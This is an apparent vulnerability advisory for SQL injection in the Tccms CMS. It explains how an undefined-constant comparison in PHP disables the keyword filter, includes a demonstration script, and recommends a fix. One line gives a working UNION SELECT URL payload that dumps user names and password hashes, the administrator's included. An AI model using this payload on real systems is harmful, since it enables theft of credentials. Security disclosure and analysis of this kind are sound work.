Tccms SQL Injection #2
Root cause: a check against an undefined constant.
See system/core/controller.class.php:
private function forceAttack() {
    $attack = M('attack');
    // Blacklist check for non-admin requests (note: this branch correctly uses defined('IN_ADMIN'))
    if (Config::get("blackcheck") == 1 && !defined('IN_ADMIN') && $_GET['ac'] != 'common_newCode') {
        $canBePass = $attack->checkForbidden();
        if ($canBePass) {
            $this->setValue("error", Config::lang("YOUAREPROHIBITED"));
            $this->forward("error.html");
            exit;
        }
    }
    // SQL keyword filter: intended to run for every front-end request when checkHack is on.
    // IN_ADMIN is used here as a bare constant, without a defined() guard.
    if (Config::get("checkHack") && IN_ADMIN != TRUE) {
        $attack->initLogHacker();
    }
}
When Config::get("checkHack") && IN_ADMIN != TRUE holds, initLogHacker() is called; that method is the filter that inspects request parameters for SQL keywords.
checkHack is enabled by default, but the IN_ADMIN constant is never defined for front-end requests. When PHP encounters an undefined constant it assumes you meant the constant's name as a string (CONSTANT becomes "CONSTANT") and raises an E_NOTICE (see http://php.net/manual/zh/language.constants.syntax.php). This fallback is deprecated since PHP 7.2 and removed in PHP 8.0, where an undefined constant throws an Error instead; the bypass described below therefore applies to deployments on PHP 7.x and earlier.
So here IN_ADMIN evaluates to the string "IN_ADMIN", which is a non-empty string and therefore truthy.
With loose comparison, "IN_ADMIN" != TRUE is false, because a non-empty string converts to TRUE. The whole condition Config::get("checkHack") && IN_ADMIN != TRUE is thus false and initLogHacker() is never called: the SQL filter is silently disabled for every front-end request.
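The following script is an added example, not Tccms code, that reproduces the comparison above and shows a guarded rewrite of the check. The function names shouldFilterOriginal() and shouldFilterFixed() are assumptions introduced for illustration; the undefined constant's value is passed in as a parameter so the script runs on any PHP version (on PHP 8 a bare undefined constant would throw an Error before the comparison is reached).

```php
<?php
// Added example (not part of Tccms): why the checkHack branch in forceAttack()
// never fires when IN_ADMIN is undefined, and a guarded rewrite.

// 1. The loose comparison the original relies on. On PHP < 8 an undefined
//    constant is replaced by its own name as a string, so the comparison
//    actually performed is "IN_ADMIN" != TRUE.
var_dump("IN_ADMIN" != TRUE);   // non-empty string is truthy, so loose != TRUE is false
var_dump("IN_ADMIN" !== TRUE);  // strict comparison distinguishes string from bool

// 2. The original logic, with the constant's value injected so the script
//    runs regardless of PHP version. Hypothetical helper, not Tccms code.
function shouldFilterOriginal(bool $checkHack, $inAdmin): bool
{
    return $checkHack && $inAdmin != TRUE;
}

// 3. Hardened logic: an undefined IN_ADMIN means "not in the admin area",
//    and the defined constant is compared strictly. Hypothetical helper.
function shouldFilterFixed(bool $checkHack): bool
{
    $inAdmin = defined('IN_ADMIN') && IN_ADMIN === TRUE;
    return $checkHack && !$inAdmin;
}

// Front-end request: IN_ADMIN undefined, checkHack on (the default).
var_dump(shouldFilterOriginal(true, 'IN_ADMIN')); // original check with PHP's string fallback
var_dump(shouldFilterFixed(true));                 // guarded check, constant still undefined

// Admin request: the application defines IN_ADMIN before reaching the controller.
define('IN_ADMIN', TRUE);
var_dump(shouldFilterFixed(true));                 // guarded check inside the admin area
```

Run with php on the command line. The first two var_dump calls show that the string fallback defeats the loose comparison but not a strict one; shouldFilterOriginal() returns false for the front-end case, i.e. the filter is skipped, while shouldFilterFixed() returns true for the same request and false only once IN_ADMIN has actually been defined as TRUE. Note that the guard alone does not make the application safe: initLogHacker() is a keyword blacklist, and the yz parameter should additionally be bound as a query parameter or cast to an integer rather than interpolated into SQL.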
Register an ordinary user, log in, and request the following URL (the yz parameter is not filtered because initLogHacker() never runs, and the UNION SELECT with 29 columns matches the original query):
http://localhost/index.php?ac=news_all&yz=1%20union%20select%20group_concat%28username,0x23,password%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20from%20tc_user%23
The usernames and password hashes of all users in tc_user, including the administrator, are returned in the response.
Solution:
Guard the check with defined('IN_ADMIN') (as the blackcheck branch in the same function already does) so that initLogHacker() actually runs for front-end requests, and pass yz to the database as a bound parameter or integer rather than concatenating it into the query.